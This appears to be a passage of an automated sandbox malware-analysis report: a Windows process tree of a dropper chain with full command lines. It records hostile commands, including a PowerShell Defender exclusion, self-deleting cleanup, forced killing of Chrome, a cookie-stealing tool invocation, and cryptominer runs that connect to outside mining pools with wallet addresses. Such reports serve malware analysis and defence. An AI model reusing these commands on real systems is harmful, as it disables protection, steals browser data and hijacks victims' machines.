        "C:\Users\Admin\AppData\Local\Temp\5paasmiurye\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:9716
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        21⤵
        
        PID:688
        
        C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        22⤵
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\AdvancedRun.exe" /SpecialRun 4101d8 4048
        23⤵
        
        PID:7556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        22⤵
        
        PID:8552
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        22⤵
        
        PID:10320
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        23⤵
        Delays execution with timeout.exe
        
        PID:9528
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 1508
        22⤵
        Program crash
        
        PID:10612
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        21⤵
        
        PID:8796
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\wy44jzjlajm\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wy44jzjlajm\vpn.exe" /silent /subid=482
        20⤵
        
        PID:9704
        
        C:\Users\Admin\AppData\Local\Temp\is-65BS9.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-65BS9.tmp\vpn.tmp" /SL5="$20840,15170975,270336,C:\Users\Admin\AppData\Local\Temp\wy44jzjlajm\vpn.exe" /silent /subid=482
        21⤵
        
        PID:10068
        
        C:\Users\Admin\AppData\Local\Temp\qxuef0ruhs5\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qxuef0ruhs5\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:9652
        
        C:\Users\Admin\AppData\Local\Temp\is-V1FOT.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-V1FOT.tmp\vict.tmp" /SL5="$404D2,870426,780800,C:\Users\Admin\AppData\Local\Temp\qxuef0ruhs5\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:6872
        
        C:\Users\Admin\AppData\Local\Temp\is-06CEJ.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-06CEJ.tmp\win1host.exe" 535
        22⤵
        
        PID:656
        
        C:\Users\Admin\AppData\Local\Temp\3zuipgb55h0\1npmtp54rzm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3zuipgb55h0\1npmtp54rzm.exe" /ustwo INSTALL
        20⤵
        
        PID:9640
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "1npmtp54rzm.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3zuipgb55h0\1npmtp54rzm.exe" & exit
        21⤵
        
        PID:8124
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "1npmtp54rzm.exe" /f
        22⤵
        Kills process with taskkill
        
        PID:5468
        
        C:\Users\Admin\AppData\Local\Temp\gfssno2sf2x\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gfssno2sf2x\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:9632
        
        C:\Users\Admin\AppData\Local\Temp\h5j3cpp31uf\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\h5j3cpp31uf\app.exe" /8-23
        20⤵
        
        PID:9624
        
        C:\Users\Admin\AppData\Local\Temp\AI1VB44XQC\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AI1VB44XQC\setups.exe" ll
        17⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\6b-585b4-827-0278a-43c71cb5f0bd8\Rashesodaely.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6b-585b4-827-0278a-43c71cb5f0bd8\Rashesodaely.exe"
        14⤵
        
        PID:4280
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        11⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        Checks whether UAC is enabled
        Modifies registry class
        
        PID:4428
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        11⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        12⤵
        
        PID:5996
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        13⤵
        
        PID:5376
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"
        11⤵
        
        PID:3204
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:5700
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        11⤵
        
        PID:5160
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        12⤵
        
        PID:4508
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        12⤵
        
        PID:6440
        
        C:\Users\Admin\Videos\lilal.exe
        
        "C:\Users\Admin\Videos\lilal.exe"
        13⤵
        
        PID:9016
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        14⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui
        14⤵
        
        PID:9076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        15⤵
        
        PID:8104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 6440 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        13⤵
        
        PID:6468
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 6440
        14⤵
        Kills process with taskkill
        
        PID:892
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        14⤵
        
        PID:8636
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        11⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        12⤵
        
        PID:5544
        
        C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe" 1 3.1617432480.60680fa0da84b 103
        13⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Z0EU3H9VKI\multitimer.exe" 2 3.1617432480.60680fa0da84b
        14⤵
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\tibmdhuf1ku\jkfympbgygy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tibmdhuf1ku\jkfympbgygy.exe" /ustwo INSTALL
        15⤵
        
        PID:6636
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "jkfympbgygy.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tibmdhuf1ku\jkfympbgygy.exe" & exit
        16⤵
        
        PID:8024
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "jkfympbgygy.exe" /f
        17⤵
        Kills process with taskkill
        
        PID:8008
        
        C:\Users\Admin\AppData\Local\Temp\bwvgwudpa0o\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bwvgwudpa0o\vpn.exe" /silent /subid=482
        15⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\is-P5VG1.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-P5VG1.tmp\vpn.tmp" /SL5="$20424,15170975,270336,C:\Users\Admin\AppData\Local\Temp\bwvgwudpa0o\vpn.exe" /silent /subid=482
        16⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\z3f0ipaiq1k\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\z3f0ipaiq1k\app.exe" /8-23
        15⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\ujjr5if0oni\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ujjr5if0oni\cpyrix.exe" /VERYSILENT
        15⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        16⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        17⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4fef1278-25c0-422c-9921-e8012c72468f\AdvancedRun.exe" /SpecialRun 4101d8 4868
        18⤵
        
        PID:4704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        17⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        17⤵
        
        PID:7668
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        18⤵
        Delays execution with timeout.exe
        
        PID:7648
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        17⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1612
        17⤵
        Program crash
        
        PID:4452
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        16⤵
        
        PID:5248
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        17⤵
        
        PID:6404
        
        C:\Users\Admin\AppData\Local\Temp\4h1ijecezyt\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4h1ijecezyt\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:6628
        
        C:\Users\Admin\AppData\Local\Temp\is-NI8LH.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NI8LH.tmp\Setup3310.tmp" /SL5="$9035A,138429,56832,C:\Users\Admin\AppData\Local\Temp\4h1ijecezyt\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\Temp\is-1A78J.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1A78J.tmp\Setup.exe" /Verysilent
        17⤵
        
        PID:5364
        
        C:\Users\Admin\AppData\Local\Temp\rnynw1klbku\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rnynw1klbku\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\is-OUR8D.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OUR8D.tmp\vict.tmp" /SL5="$10404,870426,780800,C:\Users\Admin\AppData\Local\Temp\rnynw1klbku\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\is-N2E93.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-N2E93.tmp\win1host.exe" 535
        17⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\nbbbujxtqmz\hzf0aepxeaq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nbbbujxtqmz\hzf0aepxeaq.exe" /quiet SILENT=1 AF=756
        15⤵
        
        PID:6924
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\nbbbujxtqmz\hzf0aepxeaq.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\nbbbujxtqmz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617173323 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        16⤵
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\DDBEZNPCBI\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DDBEZNPCBI\setups.exe" ll
        12⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\is-P74U5.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-P74U5.tmp\setups.tmp" /SL5="$60308,635399,250368,C:\Users\Admin\AppData\Local\Temp\DDBEZNPCBI\setups.exe" ll
        13⤵
        
        PID:3900
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        11⤵
        
        PID:6088
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:5972
        
        C:\Users\Admin\AppData\Local\Temp\tibml2jmbhk\KiffApp1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tibml2jmbhk\KiffApp1.exe"
        8⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\cx2tbp4zts0\ltam0qvkiqz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cx2tbp4zts0\ltam0qvkiqz.exe" /ustwo INSTALL
        8⤵
        
        PID:4568
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "ltam0qvkiqz.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\cx2tbp4zts0\ltam0qvkiqz.exe" & exit
        9⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "ltam0qvkiqz.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\pr3hlgwo1fk\liu4npgvaww.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pr3hlgwo1fk\liu4npgvaww.exe" /VERYSILENT
        8⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\is-8833J.tmp\liu4npgvaww.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8833J.tmp\liu4npgvaww.tmp" /SL5="$40308,2592217,780800,C:\Users\Admin\AppData\Local\Temp\pr3hlgwo1fk\liu4npgvaww.exe" /VERYSILENT
        9⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\p011pob0lx5\djlvga2zyuq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\p011pob0lx5\djlvga2zyuq.exe"
        8⤵
        
        PID:4128
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\p011pob0lx5\djlvga2zyuq.exe"
        9⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\r2izeuhuva5\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\r2izeuhuva5\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:4308
        
        C:\Users\Admin\AppData\Local\Temp\is-9PA9V.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9PA9V.tmp\vict.tmp" /SL5="$20252,870426,780800,C:\Users\Admin\AppData\Local\Temp\r2izeuhuva5\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\is-R4CO9.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-R4CO9.tmp\win1host.exe" 535
        10⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\D4jtFRYbw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\D4jtFRYbw.exe"
        11⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\D4jtFRYbw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\D4jtFRYbw.exe"
        12⤵
        
        PID:4216
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 612
        11⤵
        Program crash
        
        PID:9464
        
        C:\Users\Admin\AppData\Local\Temp\fcnjnjftwga\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fcnjnjftwga\vpn.exe" /silent /subid=482
        8⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\is-K3J6J.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-K3J6J.tmp\vpn.tmp" /SL5="$30266,15170975,270336,C:\Users\Admin\AppData\Local\Temp\fcnjnjftwga\vpn.exe" /silent /subid=482
        9⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5408
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:5836
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:6524
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:11120
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:10896
        
        C:\Users\Admin\AppData\Local\Temp\qge1bu5x1pe\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qge1bu5x1pe\app.exe" /8-23
        8⤵
        
        PID:4228
        
        C:\Users\Admin\AppData\Local\Temp\acu2xd4mz0z\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\acu2xd4mz0z\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\meex2zstena\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\meex2zstena\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:4132
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:5772
        
        C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        10⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8feb36a3-79f4-4545-9f18-e8ba92c5eaae\AdvancedRun.exe" /SpecialRun 4101d8 4480
        11⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        10⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        11⤵
        Delays execution with timeout.exe
        
        PID:836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        10⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        10⤵
        
        PID:5864
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 2012
        10⤵
        Program crash
        
        PID:4300
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:5832
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:6036
    - - C:\Users\Admin\AppData\Local\Temp\HD6LD44DBQ\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HD6LD44DBQ\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2068
      - C:\Users\Admin\AppData\Local\Temp\is-OJQSN.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OJQSN.tmp\setups.tmp" /SL5="$4010C,635399,250368,C:\Users\Admin\AppData\Local\Temp\HD6LD44DBQ\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:964
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3636
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3428
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4212
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"
      4⤵
      PID:4708
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:4780
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:4980
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      PID:4852
    - - C:\Users\Admin\AppData\Roaming\D69F.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\D69F.tmp.exe"
        5⤵
        
        PID:2560
      - C:\Users\Admin\AppData\Roaming\D69F.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\D69F.tmp.exe"
        6⤵
        
        PID:4736
    - - C:\Users\Admin\AppData\Roaming\D7F8.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\D7F8.tmp.exe"
        5⤵
        
        PID:4220
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:4524
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:2020
    - - C:\Users\Admin\AppData\Roaming\D8D3.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\D8D3.tmp.exe"
        5⤵
        
        PID:4796
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\D8D3.tmp.exe
        6⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:7072
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:3732
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:4240
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      PID:4812
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:8120
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:3516
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5740
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:8224

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
